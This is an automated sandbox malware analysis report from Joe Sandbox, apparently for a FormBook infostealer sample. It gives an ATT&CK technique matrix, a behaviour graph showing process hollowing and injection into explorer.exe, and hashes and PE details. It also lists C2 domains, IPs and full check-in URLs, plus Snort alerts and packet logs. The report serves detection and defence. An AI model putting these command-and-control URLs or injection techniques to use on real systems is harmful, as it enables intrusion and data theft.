          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528618 Sample: cK1g5gckZR9VHjj.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 30 www.pittsburghdata.center 2->30 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 11 cK1g5gckZR9VHjj.exe 3 2->11         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 11->58 14 cK1g5gckZR9VHjj.exe 11->14         started        17 cK1g5gckZR9VHjj.exe 11->17         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 19 explorer.exe 14->19 injected process8 dnsIp9 32 www.qzttb.net 154.94.210.101, 49779, 80 ROOTNETWORKSUS Seychelles 19->32 34 www.dragonmodz.net 142.252.22.166, 49821, 80 EGIHOSTINGUS United States 19->34 36 3 other IPs or domains 19->36 46 System process connects to network (likely due to code injection or exploit) 19->46 48 Uses netsh to modify the Windows network and firewall settings 19->48 23 netsh.exe 19->23         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd0%Avira URL Cloudsafe
          http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd0%Avira URL Cloudsafe
          http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd0%Avira URL Cloudsafe
          www.spoiledzone.com/udeh/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.qzttb.net
          154.94.210.101
          truetrue
            unknown
            www.royaldears.com
            3.64.163.50
            truetrue
              unknown
              www.dragonmodz.net
              142.252.22.166
              truetrue
                unknown
                www.pittsburghdata.center
                209.17.116.163
                truetrue
                  unknown
                  www.blueprintroslyn.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    unknown
                    www.spoiledzone.com/udeh/true
                    • Avira URL Cloud: safe
                    low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        142.252.22.166
                        www.dragonmodz.netUnited States
                        18779EGIHOSTINGUStrue
                        154.94.210.101
                        www.qzttb.netSeychelles
                        32708ROOTNETWORKSUStrue
                        3.64.163.50
                        www.royaldears.comUnited States
                        16509AMAZON-02UStrue
                        209.17.116.163
                        www.pittsburghdata.centerUnited States
                        55002DEFENSE-NETUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528618
                        Start date:25.11.2021
                        Start time:15:09:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:cK1g5gckZR9VHjj.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/1@7/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 13.9% (good quality ratio 12.4%)
                        • Quality average: 72.5%
                        • Quality standard deviation: 32.1%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 51.104.136.2, 51.11.168.232, 131.253.33.200, 13.107.22.200
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528618/sample/cK1g5gckZR9VHjj.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        15:10:15API Interceptor27x Sleep call for process: cK1g5gckZR9VHjj.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        3.64.163.50Nuevo Pedido.exeGet hashmaliciousBrowse
                        • www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN
                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                        • www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z
                        xDG1WDcI0o.exeGet hashmaliciousBrowse
                        • www.warriorsouls.com/imnt/?w4=173jVSvDSoGUE2AW1ivoK5ykCyKPADg/LonPGNHNCQX2BYegbwJ7vTJYHkxtjawzsEfN&nHNxLR=Q48l
                        Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                        • www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP
                        Xl1gbEIo0b.exeGet hashmaliciousBrowse
                        • www.teachermeta.com/btn2/?nRk=QvINNIMzsRYf/0qmivF6Dmovk+WpXAaZUAI4egrxWGuGQnhzgyC+G4dLS9x+/CyjCjh9&sFN0Yx=JL0hlxBhSB
                        Rev_NN doccument.docGet hashmaliciousBrowse
                        • www.brettneoheroes.com/e6b3/
                        202111161629639000582.exeGet hashmaliciousBrowse
                        • www.sketchnfts.com/wkgp/?4h5=jdmv8BZZ/B46r0we2YWB0KZ3uGSoSKuz6a4pN1QKcZ2F8xRxcAMtTOc/gzvsbCezLg9G&2dX=P6APITtHDX2tmpK
                        Ez6r9fZIXc.exeGet hashmaliciousBrowse
                        • www.battlegroundxr.com/ad6n/?G8a0vHm=ZcTQfm3E3Bis9O+U1J+3C+jUHMxN8jyTuxkjib6Q0pkS+Pn4CLfVing+78WMbf+swImY&6lrHq=5jktfN6hH6
                        New Order INQ211118.exeGet hashmaliciousBrowse
                        • www.cleversights.com/ng6c/?JBGdjn1=EPV2/NoACT8dHOR9v1gyCHceGsyPjrlJM+UK8aQEskssrzMl224UALhiEE2fgJmZ+elx&8pB8=1bqLQxdXG
                        Quote.exeGet hashmaliciousBrowse
                        • www.sandspringsramblers.com/g2fg/?1btd=IfCDV&CTEp9H=ge+LGbGWprSeotpzV0+Q+kydhBjB2swQkk5yFtO6ceAAyVR8yEXyjgFWO6AISkVeqI4m
                        111821 New Order_xlxs.exeGet hashmaliciousBrowse
                        • www.methodicalservices.com/oae0/?UDKtfT=0pSD8r20Ixf8_&9rGxtBkx=0YzjOyVp+Yb6xacNTkTkmGCYCJkm2COrsGtOu7+4k+P6CiNE0Q3WT0+8/3B2OogfveoZ
                        rEC0x536o5.exeGet hashmaliciousBrowse
                        • www.evaccines.com/s3f1/?XZeT=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&_dIpGp=dTiPIlmXgVLtX
                        Booking Confirmation 548464656_pdf.exeGet hashmaliciousBrowse
                        • www.metaversealive.com/cfb2/?4hGdfRT=Agu3xtL1ZQO5CFfrtHOGjgVP3skWkN/ViqH4UJ4za8OjNS089a88X4B7IihWeXraBDmd&2dM4Gf=e4hhCbFxvtz0ztm
                        Purchase Order Ref No_ Q51100732.xlsxGet hashmaliciousBrowse
                        • www.fondoflouisville.com/dyh6/?NL0hl=kQyzM0Wln+3leUBi0Wmn3eENdAam7BCJPPELL5jXxpKBYvrw3jMhvOGuqF2XIvtdQ71vEA==&v2M=r0DdC04HWpDX
                        AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                        • www.inklusion.online/n8ds/?9rJT=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&at=WtR4GZm
                        order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                        • www.godrejs-windsor.com/vocn/?5jYXyzb=pnlTJGUzE5gMj2POSUsxOYM9XX/o1stqBdRTzx6fWnpbF/A27HO5FUQYdB9AbrLCdWzy&IL08W8=d6AXkVBHUjyXZ
                        Inquiry Sheet.docGet hashmaliciousBrowse
                        • www.babehairboutique.com/cy88/?7nLpW=-ZKlyLs0ebYdGfJ&QZ=K8MP/gXd9fA79gQ3nARZg5fl4N3QoqdUhkC4TU9uNhwqyFbAVwd8tffptZPcvcemife8Lg==
                        PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                        • www.webmakers.xyz/seqa/?tvv=ihZT8RaXnH5DP6&R48TL=PArQXewhCLQ/aGYQG57zH1nhkqDi1nj517XyI5njozHkI0sb3Vjromuzr7tZwLe6Yf/2
                        ORDER REMINDER.docGet hashmaliciousBrowse
                        • www.quetaylor.com/zaip/?r2JPlFDH=HAqh6cOe6LTcTwCBF16MZHaJ4csidjMHsZ2CzJlUzLX8i4OfANm4LybqNg7cEAPcNuVe8g==&Ozu8Z=qxoHsxEPs4u
                        Order Specification.docGet hashmaliciousBrowse
                        • www.vestamobile.com/c28n/?-Zl=BwxsM8rRu+R6ZjIadp4KdiQptkWWHTzqe5Z/ld4s21xj8K8eoUYG89NnPoNyzSQIYa401Q==&Rnjl=fpapUTW

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        EGIHOSTINGUSor4ypx7EryGet hashmaliciousBrowse
                        • 172.120.223.197
                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                        • 172.120.157.187
                        SOA.exeGet hashmaliciousBrowse
                        • 45.39.212.96
                        Swift Copy TT.docGet hashmaliciousBrowse
                        • 142.111.110.248
                        Product Offerety44663573.xlsxGet hashmaliciousBrowse
                        • 68.68.98.160
                        Env#U00edo diciembre.exeGet hashmaliciousBrowse
                        • 104.253.94.109
                        IAENMAI.xlsxGet hashmaliciousBrowse
                        • 23.27.137.70
                        jydygx.arm7Get hashmaliciousBrowse
                        • 107.165.18.79
                        202111161629639000582.exeGet hashmaliciousBrowse
                        • 166.88.19.181
                        w8aattzDPjGet hashmaliciousBrowse
                        • 172.121.95.168
                        XxMcevQr2ZGet hashmaliciousBrowse
                        • 172.120.108.136
                        sora.armGet hashmaliciousBrowse
                        • 136.0.238.242
                        x3mKjigp7jGet hashmaliciousBrowse
                        • 216.172.145.226
                        588885.xlsxGet hashmaliciousBrowse
                        • 107.187.86.150
                        New Order INQ211118.exeGet hashmaliciousBrowse
                        • 23.230.105.118
                        REltoQA3nv.exeGet hashmaliciousBrowse
                        • 107.164.102.213
                        uranium.x86Get hashmaliciousBrowse
                        • 136.0.81.164
                        SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                        • 50.118.200.122
                        order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                        • 142.111.56.40
                        zhaP868fw5Get hashmaliciousBrowse
                        • 23.27.237.204
                        ROOTNETWORKSUSArrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                        • 154.94.229.8
                        eh.armGet hashmaliciousBrowse
                        • 154.82.151.141
                        l1z4rdsQu4D.x86Get hashmaliciousBrowse
                        • 154.27.158.217
                        d8Hs7X8HGPGet hashmaliciousBrowse
                        • 154.27.246.223
                        y2NMF6ulOIGet hashmaliciousBrowse
                        • 154.82.103.232
                        Hilix.armGet hashmaliciousBrowse
                        • 154.82.151.120
                        document.exeGet hashmaliciousBrowse
                        • 154.82.127.19
                        yXTRZQmYdrGet hashmaliciousBrowse
                        • 154.94.148.183
                        Owari.arm7Get hashmaliciousBrowse
                        • 154.82.103.252
                        JuihXmkZGFGet hashmaliciousBrowse
                        • 154.94.148.170
                        2gRh8To5o9Get hashmaliciousBrowse
                        • 154.27.246.214
                        zFDNFIXYHnGet hashmaliciousBrowse
                        • 103.211.168.19
                        peach.armGet hashmaliciousBrowse
                        • 156.236.248.47
                        zgV2Uq4fmuGet hashmaliciousBrowse
                        • 156.236.225.9
                        7fic3HM8I3Get hashmaliciousBrowse
                        • 156.236.225.7
                        mixazed_20210816-155711.exeGet hashmaliciousBrowse
                        • 154.82.111.78
                        M8XFTAqveTGet hashmaliciousBrowse
                        • 154.82.151.133
                        RR8K3UpQdtGet hashmaliciousBrowse
                        • 38.240.210.8
                        Qka3fi8NpLGet hashmaliciousBrowse
                        • 154.82.151.169
                        Z7bNxhhS7yGet hashmaliciousBrowse
                        • 154.82.151.124

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.log
                        Process:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.842673281078141
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:cK1g5gckZR9VHjj.exe
                        File size:445440
                        MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
                        SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
                        SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
                        SHA512:9819afc87fe9dc827cfdaf7a676ab8e01f7e419ac09e354cbb3270e167527db2ffea6d61fbe46469c14e3a8a2689f26c98712606e0878294167ed7e15e6fb2c5
                        SSDEEP:12288:G/NdU0VixBFmkJ+W/wCCGBRG5F2ZBGutgq:G/vU0Vi1nJ+dCPukAuJ
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...hI.a..............0.................. ........@.. .......................@............@................................

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x46e0b6
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4968 [Thu Nov 25 08:29:28 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0640x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x5c4.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x6c0cc0x6c200False0.883977601156data7.85526570093IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x700000x5c40x600False0.4296875data4.13349213194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_VERSION0x700900x334data
                        RT_MANIFEST0x703d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Rogers Peet
                        Assembly Version8.0.6.0
                        InternalNameIVectorVi.exe
                        FileVersion5.6.0.0
                        CompanyNameRogers Peet
                        LegalTrademarks
                        Comments
                        ProductNameBiblan
                        ProductVersion5.6.0.0
                        FileDescriptionBiblan
                        OriginalFilenameIVectorVi.exe

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        11/25/21-15:11:39.736402ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                        11/25/21-15:11:41.436557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50
                        11/25/21-15:11:41.436557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50
                        11/25/21-15:11:41.436557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980180192.168.2.63.64.163.50

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 15:11:35.934700012 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.124350071 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.124520063 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.125092030 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336148024 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336168051 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336180925 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336196899 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336213112 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336227894 CET8049779154.94.210.101192.168.2.6
                        Nov 25, 2021 15:11:36.336288929 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336435080 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.336544037 CET4977980192.168.2.6154.94.210.101
                        Nov 25, 2021 15:11:36.526585102 CET8049779154.94.210.101192.168.2.6
